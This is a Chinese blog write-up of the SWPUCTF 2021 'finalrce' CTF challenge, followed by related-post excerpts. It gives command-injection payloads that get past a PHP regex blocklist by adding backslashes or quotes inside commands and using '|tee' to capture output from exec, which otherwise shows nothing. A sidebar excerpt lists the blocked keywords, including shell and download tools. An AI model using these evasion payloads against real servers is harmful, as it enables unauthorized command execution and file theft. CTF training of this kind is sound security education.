[SWPUCTF 2021 新生赛]finalrce(管道符(|)+tee绕过exec无回显 反斜杠或者单(双)引号绕过正则表达式)

于 2024-07-09 21:01:19 发布
阅读量337 收藏 5
点赞数 10
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84499442/article/details/140306083
版权

 首先看源码

第一点,我们需要绕过正则表达式

第二点,由于exec不返回命令执行结果,所以要进行输出重定向

由于正则表达式过滤掉了很多命令,但是注意看,反斜杠和单引号都没有被注释掉,那么我们就可以利用这一点来绕过被禁止掉的命令

构造payload:url=l\s /|tee 1.txt;

                        url=l's' /|tee 2.txt;

                      

第二种payload

这里需要说明一下

所以这里的|tee就是将ls出的内容重定向到txt文本中

得到敏感文件,再进行内容读取,由于cat和la同样被禁用,还是相同的方法

构造payload

?url=ca\t%20/flllll\aaaaaaggggggg|tee%201.txt;

?url=c\at%20/flllll\aaaaaaggggggg|tee%203.txt;

?url=c'a't%20/flllll'a'aaaaaggggggg|tee%204.txt;

随便选择一种都可以

总结:当正则表达式没有过滤掉反斜杠或者单引号或者双引号(本题双引号被过滤,不再演示),那么可以使用单引号或者双引号包裹命令(ls cat等)任意一个字符,只要他们不是一个整体就行,或者使用反斜杠插入到命令里面(ca\t  c\at等)即可实现绕过。

小吕要加油
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web189 无引号,利用回显不同,盲注
10-21
ctfshow web189 无引号,利用回显不同,盲注
[SWPUCTF 2021 新生]finalrce
最新发布
2302_80059204的博客
03-11 155
首先要注意的是,php脚本中,使用的输出函数是exec,这是无法将输出内容返回到页面的,所以使用将输出复制一份并输出到终端窗口以及写入到名为文本的文件中的方法。得到文件目录,之后使用类似的命令,将flllllaaaaaaggggggg文件中的内容进行查询。tee 1.txt:将输出复制一份并输出到终端窗口以及写入到名为1.txt的文件中。看到有一个正则匹配名,要获取flag,首先肯定是要绕过这些的。|:将前一个命令的输出作为后一个命令的输入;同样,访问2.txt文件得到flag。
[SWPUCTF 2021 新生]finalrce(tee)
kuzemax的博客
05-29 235
可以看到的是没有过滤|这个号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。本来应该是url=ls/ 可是ls被过滤掉了,然后看别的up主说,l\s可以代替ls |是执行以下命令的意思。
SWPUCTF 2021 新生 RCE题目
m0_74160536的博客
05-26 621
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
ctfshow web190 二分法盲注经典脚本 有引号,利用回显不同
10-21
ctfshow web190 二分法盲注经典脚本 有引号,利用回显不同
STM32F103+ESP8266AT指令测试以及回显.zip
12-04
5. **回显功能**:回显是指ESP8266接收到的AT指令及参数在执行后原样返回到发送端,这有助于开发者验证指令是否正确发送和接收,以及模块是否正常工作。在调试过程中,回显功能非常实用,可以快速定位问题所在。 6....
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
Vue+elementUI实现多图片上传与回显功能(含回显后继续上传或删除)
10-15
在开发过程中,有时我们需要实现多图片上传与回显的功能,尤其是在创建或编辑表时,用户可能需要上传多张图片,并在页面加载时能够显示出已保存的图片。本文将详细介绍如何使用 Vue 和 Element UI 来实现这一功能...
[SWPUCTF 2021 新生]finalrce wp
Leaf_initial的博客
04-12 536
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。
[SWPUCTF 2021 新生]finalrce 做题记录
qq_64222098的博客
04-10 244
由于函数exec()执行完不返回结果,所以我们可以借助tee把命令写到文件里面去。通过访问文件来得到结果。虽然ls被禁了,但是我们可以用转义或者引号绕过。最终是在flllllaaaaaaggggggg里面找到的flag。在linux里有一个tee命令。这里贴一下菜鸟教程的解释。一般用的命令都被禁了。然后访问2.txt就可以了。然后去访问1.txt。
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3941
NSSCTF-Web安全入门-wp
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1307
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
vue+springboot+ffmpeg实现视频上传以及回显
05-05
实现视频上传和回显,需要涉及前端页面、后端接口以及视频处理等多方面的技术。下面我将从这些方面一步一步介绍具体实现方法。 1. 前端页面 前端页面需要有一个上传视频的功能,可以使用`<input type="file">`标签实现。在上传时,可以通过`FormData`对象将视频文件和一些其他参数一起发送到后端接口。示例代码如下: ```html <template> <div> <input type="file" @change="handleFileUpload"> <button @click="uploadVideo">上传</button> <video v-if="videoUrl" :src="videoUrl" controls></video> </div> </template> <script> export default { data() { return { videoUrl: '' } }, methods: { handleFileUpload(event) { this.videoFile = event.target.files[0] }, async uploadVideo() { const formData = new FormData() formData.append('file', this.videoFile) formData.append('name', 'video') const response = await fetch('/api/upload', { method: 'POST', body: formData }) const data = await response.json() if (data.success) { this.videoUrl = data.videoUrl } } } } </script> ``` 2. 后端接口 后端接口使用SpringBoot框架,需要使用`@RestController`和`@PostMapping`注解来实现视频上传接口。接收到视频文件后,可以使用FFmpeg库来处理视频文件,将视频转换为指定格式或者提取视频的缩略图等。 ```java @RestController public class VideoController { @PostMapping("/api/upload") public ApiResponse uploadVideo(@RequestParam("file") MultipartFile file) { if (file.isEmpty()) { return ApiResponse.error("上传文件不能为空"); } try { // 保存视频文件并返回视频的URL String videoUrl = saveVideo(file); return ApiResponse.success(videoUrl); } catch (Exception e) { e.printStackTrace(); return ApiResponse.error("上传失败"); } } private String saveVideo(MultipartFile file) throws Exception { String fileName = UUID.randomUUID().toString() + ".mp4"; File dest = new File("uploads/" + fileName); file.transferTo(dest); return "http://localhost:8080/uploads/" + fileName; } } ``` 3. 视频处理 视频处理需要使用FFmpeg库来实现。在SpringBoot项目中,可以使用`ProcessBuilder`来执行FFmpeg命令。下面是一个实现视频转换为MP4格式的示例代码: ```java private void convertToMp4(String inputPath, String outputPath) throws Exception { String command = String.format("ffmpeg -i %s -c:v libx264 -preset slow -crf 22 -c:a aac -b:a 128k -movflags faststart -f mp4 %s", inputPath, outputPath); Process process = new ProcessBuilder(command.split(" ")).redirectErrorStream(true).start(); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { System.out.println(line); } process.waitFor(); reader.close(); inputStream.close(); } ``` 以上是实现视频上传和回显的基本步骤,具体实现还需要根据具体需求进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值